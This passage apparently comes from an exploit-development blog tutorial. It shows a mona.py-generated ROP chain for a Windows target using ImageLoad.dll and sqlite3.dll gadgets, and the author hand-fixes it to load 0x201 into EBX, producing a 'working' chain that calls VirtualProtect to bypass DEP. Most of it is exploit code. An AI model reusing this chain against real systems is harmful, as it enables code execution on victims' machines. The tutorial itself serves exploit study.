<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
<span class='line-number'>38</span>
<span class='line-number'>39</span>
<span class='line-number'>40</span>
<span class='line-number'>41</span>
<span class='line-number'>42</span>
<span class='line-number'>43</span>
<span class='line-number'>44</span>
<span class='line-number'>45</span>
<span class='line-number'>46</span>
<span class='line-number'>47</span>
<span class='line-number'>48</span>
<span class='line-number'>49</span>
<span class='line-number'>50</span>
<span class='line-number'>51</span>
<span class='line-number'>52</span>
<span class='line-number'>53</span>
<span class='line-number'>54</span>
<span class='line-number'>55</span>
<span class='line-number'>56</span>
<span class='line-number'>57</span>
<span class='line-number'>58</span>
<span class='line-number'>59</span>
<span class='line-number'>60</span>
<span class='line-number'>61</span>
<span class='line-number'>62</span>
<span class='line-number'>63</span>
<span class='line-number'>64</span>
<span class='line-number'>65</span>
<span class='line-number'>66</span>
<span class='line-number'>67</span>
<span class='line-number'>68</span>
<span class='line-number'>69</span>
<span class='line-number'>70</span>
<span class='line-number'>71</span>
<span class='line-number'>72</span>
<span class='line-number'>73</span>
<span class='line-number'>74</span>
<span class='line-number'>75</span>
<span class='line-number'>76</span>
<span class='line-number'>77</span>
<span class='line-number'>78</span>
<span class='line-number'>79</span>
<span class='line-number'>80</span>
<span class='line-number'>81</span>
<span class='line-number'>82</span>
<span class='line-number'>83</span>
<span class='line-number'>84</span>
<span class='line-number'>85</span>
<span class='line-number'>86</span>
<span class='line-number'>87</span>
<span class='line-number'>88</span>
<span class='line-number'>89</span>
<span class='line-number'>90</span>
<span class='line-number'>91</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="o">***</span> <span class="p">[</span> <span class="n">Python</span> <span class="p">]</span> <span class="o">***</span>
</span><span class='line'>
</span><span class='line'>  <span class="k">def</span> <span class="nf">create_rop_chain</span><span class="p">():</span>
</span><span class='line'>
</span><span class='line'>    <span class="c"># rop chain generated with mona.py - www.corelan.be</span>
</span><span class='line'>    <span class="n">rop_gadgets</span> <span class="o">=</span> <span class="p">[</span>
</span><span class='line'>      <span class="mh">0x10015442</span><span class="p">,</span>  <span class="c"># POP EAX # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x61c832d0</span><span class="p">,</span>  <span class="c"># ptr to &amp;VirtualProtect() [IAT sqlite3.dll]</span>
</span><span class='line'>      <span class="mh">0x1002248c</span><span class="p">,</span>  <span class="c"># MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x61c18d81</span><span class="p">,</span>  <span class="c"># XCHG EAX,EDI # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x1001d626</span><span class="p">,</span>  <span class="c"># XOR ESI,ESI # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x10021a3e</span><span class="p">,</span>  <span class="c"># ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x10013ad6</span><span class="p">,</span>  <span class="c"># POP EBP # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x61c227fa</span><span class="p">,</span>  <span class="c"># &amp; push esp # ret  [sqlite3.dll]</span>
</span><span class='line'>      <span class="mh">0x00000000</span><span class="p">,</span>  <span class="c"># [-] Unable to find gadget to put 00000201 into ebx</span>
</span><span class='line'>      <span class="mh">0x10022c4c</span><span class="p">,</span>  <span class="c"># XOR EDX,EDX # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x1001b4f6</span><span class="p">,</span>  <span class="c"># POP ECX # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x61c73281</span><span class="p">,</span>  <span class="c"># &amp;Writable location [sqlite3.dll]</span>
</span><span class='line'>      <span class="mh">0x100194b3</span><span class="p">,</span>  <span class="c"># POP EDI # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x1001a858</span><span class="p">,</span>  <span class="c"># RETN (ROP NOP) [ImageLoad.dll]</span>
</span><span class='line'>      <span class="mh">0x10015442</span><span class="p">,</span>  <span class="c"># POP EAX # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x90909090</span><span class="p">,</span>  <span class="c"># nop</span>
</span><span class='line'>      <span class="mh">0x100240c2</span><span class="p">,</span>  <span class="c"># PUSHAD # RETN [ImageLoad.dll] </span>
</span><span class='line'>    <span class="p">]</span>
</span><span class='line'>    <span class="k">return</span> <span class="s">&#39;&#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">&#39;&lt;I&#39;</span><span class="p">,</span> <span class="n">_</span><span class="p">)</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="n">rop_gadgets</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'>  <span class="n">rop_chain</span> <span class="o">=</span> <span class="n">create_rop_chain</span><span class="p">()</span>
</span></code></pre></td></tr></table></div></figure>


<p>Awesome, all hard work has been done for us! Well, not all of it actually - have a look at this line:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>0x00000000,  # [-] Unable to find gadget to put 00000201 into ebx</span></code></pre></td></tr></table></div></figure>


<p>Oops, mona found all but one gadget that we need for a successful ROP chain&hellip; but it&rsquo;s not the end of the world, let&rsquo;s find it ourselves! <em>And that&rsquo;s where the real fun begins.</em></p>

<p>Looking through all available gadgets that mona found, I really couldn&rsquo;t find anything simple that would put value of 201 to EBX. There were some <code>POP EBX</code> instructions available, but that was not very helpful. Why? 201 in hex contains <code>\x00</code>, which is a bad character and we can&rsquo;t use it!</p>

<p>I kept poking around and decided that I will probably need to put the value into EBX through some other register that I can easily populate with whatever value I want (specifically 201). I decided to focus on EAX.</p>

<p>With couple simple gadgets, I had 201 in EAX in no time:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'>     <span class="c"># Generate value of 201 in EAX</span>
</span><span class='line'>    <span class="mh">0x10015442</span><span class="p">,</span>  <span class="c"># POP EAX # RETN [ImageLoad.dll]</span>
</span><span class='line'>    <span class="mh">0xFFFFFDFF</span><span class="p">,</span>  <span class="c"># Value of &#39;-201&#39;</span>
</span><span class='line'>    <span class="mh">0x100231d1</span><span class="p">,</span>  <span class="c"># NEG EAX # RETN [ImageLoad.dll]</span>
</span></code></pre></td></tr></table></div></figure>


<p>Okay, how can I put it in the EBX now? Again, after a lot of searching, I couldn&rsquo;t find anything straight forward. Searched a bit more and stumbled across this:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>  0x1001da09:  # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]</span></code></pre></td></tr></table></div></figure>


<p>Cool, so it will move EAX into EBX - exactly what I wanted! But it also does couple other things afterwards that may be problematic&hellip; let&rsquo;s look into it further.</p>

<p>In simple terms, what happens next is that we are saving the address of <code>ESP+C</code> (4th argument on the stack) into <code>EAX</code> and then, we increment the value pointed to by the address stored in <code>EAX</code>. This means that for it to work correctly, we need to have a writeable location in the memory so we can <code>INC</code> the value pointed by the address in <code>EAX</code>.</p>

<p>Luckily, looking at the generated part of the chain, mona already found it for us!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>  0x61c73281,  # &Writable location [sqlite3.dll]</span></code></pre></td></tr></table></div></figure>


<p>Awesome, now we just need to do a bit of shuffling around with ESP to compensate for the first gadget and we should be fine! I ended up coming up with the following snippet:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'>     <span class="c"># Put EAX into EBX (other unneccessary stuff comes with this gadget as well...)</span>
</span><span class='line'>    <span class="mh">0x1001da09</span><span class="p">,</span>  <span class="c"># ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]</span>
</span><span class='line'>  
</span><span class='line'>    <span class="c"># Other instructions to execute after above gadget - mona found those already...</span>
</span><span class='line'>    <span class="c"># (This is just to show that gadget above picks 4th next address to put into EAX)</span>
</span><span class='line'>    <span class="mh">0xDEADBEEF</span><span class="p">,</span>
</span><span class='line'>    <span class="mh">0xDEADBEEF</span><span class="p">,</span>
</span><span class='line'>    <span class="mh">0xDEADBEEF</span><span class="p">,</span>
</span><span class='line'>
</span><span class='line'>    <span class="mh">0x61c73281</span><span class="p">,</span>  <span class="c"># &amp;Writable location [sqlite3.dll]    </span>
</span></code></pre></td></tr></table></div></figure>


<p>Also, last thing to remember is that the gadgets above will mess up our EAX register, which is a problem if we decide to insert them exactly where mona suggested. Why? Because one of the first things the suggested ROP chain does is that it sets EAX to an expected value. If we corrupt it later with our gadgets, call to <code>VirtualAlloc</code> won&rsquo;t have right arguments and the function will fail.</p>

<p>To overcome this, simply change the order and do our EBX magic as a first thing in the ROP chain. Setting up EAX will follow and we won&rsquo;t be corrupting anything.</p>

<p>Putting it all together, that&rsquo;s the final, working ROP chain:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
<span class='line-number'>38</span>
<span class='line-number'>39</span>
<span class='line-number'>40</span>
<span class='line-number'>41</span>
<span class='line-number'>42</span>
<span class='line-number'>43</span>
<span class='line-number'>44</span>
<span class='line-number'>45</span>
<span class='line-number'>46</span>
<span class='line-number'>47</span>
<span class='line-number'>48</span>
<span class='line-number'>49</span>
<span class='line-number'>50</span>
<span class='line-number'>51</span>
<span class='line-number'>52</span>
<span class='line-number'>53</span>
<span class='line-number'>54</span>
<span class='line-number'>55</span>
<span class='line-number'>56</span>
<span class='line-number'>57</span>
<span class='line-number'>58</span>
<span class='line-number'>59</span>
<span class='line-number'>60</span>
<span class='line-number'>61</span>
<span class='line-number'>62</span>
<span class='line-number'>63</span>
<span class='line-number'>64</span>
<span class='line-number'>65</span>
<span class='line-number'>66</span>
<span class='line-number'>67</span>
<span class='line-number'>68</span>
<span class='line-number'>69</span>
<span class='line-number'>70</span>
<span class='line-number'>71</span>
<span class='line-number'>72</span>
<span class='line-number'>73</span>
<span class='line-number'>74</span>
<span class='line-number'>75</span>
<span class='line-number'>76</span>
<span class='line-number'>77</span>
<span class='line-number'>78</span>
<span class='line-number'>79</span>
<span class='line-number'>80</span>
<span class='line-number'>81</span>
<span class='line-number'>82</span>
<span class='line-number'>83</span>
<span class='line-number'>84</span>
<span class='line-number'>85</span>
<span class='line-number'>86</span>
<span class='line-number'>87</span>
<span class='line-number'>88</span>
<span class='line-number'>89</span>
<span class='line-number'>90</span>
<span class='line-number'>91</span>
<span class='line-number'>92</span>
<span class='line-number'>93</span>
<span class='line-number'>94</span>
<span class='line-number'>95</span>
<span class='line-number'>96</span>
<span class='line-number'>97</span>
<span class='line-number'>98</span>
<span class='line-number'>99</span>
<span class='line-number'>100</span>
<span class='line-number'>101</span>
<span class='line-number'>102</span>
<span class='line-number'>103</span>
<span class='line-number'>104</span>
<span class='line-number'>105</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="c"># ROP chain generated with mona.py - www.corelan.be (and slightly fixed by @TheKnapsy)</span>
</span><span class='line'><span class="c"># Essentially, use PUSHAD to set all parameters and call VirtualProtect() to disable DEP.</span>
</span><span class='line'><span class="k">def</span> <span class="nf">create_rop_chain</span><span class="p">():</span>
</span><span class='line'>
</span><span class='line'>    <span class="n">rop_gadgets</span> <span class="o">=</span> <span class="p">[</span>
</span><span class='line'>    <span class="c"># Generate value of 201 in EAX</span>
</span><span class='line'>    <span class="mh">0x10015442</span><span class="p">,</span>  <span class="c"># POP EAX # RETN [ImageLoad.dll]</span>
</span><span class='line'>    <span class="mh">0xFFFFFDFF</span><span class="p">,</span>  <span class="c"># Value of &#39;-201&#39;</span>
</span><span class='line'>    <span class="mh">0x100231d1</span><span class="p">,</span>  <span class="c"># NEG EAX # RETN [ImageLoad.dll]</span>
</span><span class='line'>  
</span><span class='line'>    <span class="c"># Put EAX into EBX (other unneccessary stuff comes with this gadget as well...)</span>
</span><span class='line'>    <span class="mh">0x1001da09</span><span class="p">,</span>  <span class="c"># ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]</span>
</span><span class='line'>  
</span><span class='line'>    <span class="c"># Carry on with the ROP as generated by mona.py</span>
</span><span class='line'>    <span class="mh">0x10015442</span><span class="p">,</span>  <span class="c"># POP EAX # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x61c832d0</span><span class="p">,</span>  <span class="c"># ptr to &amp;VirtualProtect() [IAT sqlite3.dll]</span>
</span><span class='line'>  
</span><span class='line'>    <span class="c"># Compensate for the ADD EBX,EAX gadget above, jump over 1 address, which is a dummy writeable location</span>
</span><span class='line'>    <span class="c"># used solely by this the remaining part of the above gadget (it doesn&#39;t really do anything for us)</span>
</span><span class='line'>    <span class="mh">0x1001281a</span><span class="p">,</span>  <span class="c"># ADD ESP,4 # RETN [ImageLoad.dll]</span>
</span><span class='line'>    <span class="mh">0x61c73281</span><span class="p">,</span>  <span class="c"># &amp;Writable location [sqlite3.dll]</span>
</span><span class='line'>  
</span><span class='line'>    <span class="c"># And carry on further as generated by mona.py</span>
</span><span class='line'>    <span class="mh">0x1002248c</span><span class="p">,</span>  <span class="c"># MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x61c18d81</span><span class="p">,</span>  <span class="c"># XCHG EAX,EDI # RETN [sqlite3.dll]</span>
</span><span class='line'>      <span class="mh">0x1001d626</span><span class="p">,</span>  <span class="c"># XOR ESI,ESI # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x10021a3e</span><span class="p">,</span>  <span class="c"># ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x10013ad6</span><span class="p">,</span>  <span class="c"># POP EBP # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x61c227fa</span><span class="p">,</span>  <span class="c"># &amp; push esp # ret  [sqlite3.dll]</span>
</span><span class='line'>      <span class="mh">0x10022c4c</span><span class="p">,</span>  <span class="c"># XOR EDX,EDX # RETN [ImageLoad.dll] </span>
</span><span class='line'>  
</span><span class='line'>    <span class="c"># Now bunch of ugly increments... may need to look for something nicer, but hey - it works!</span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
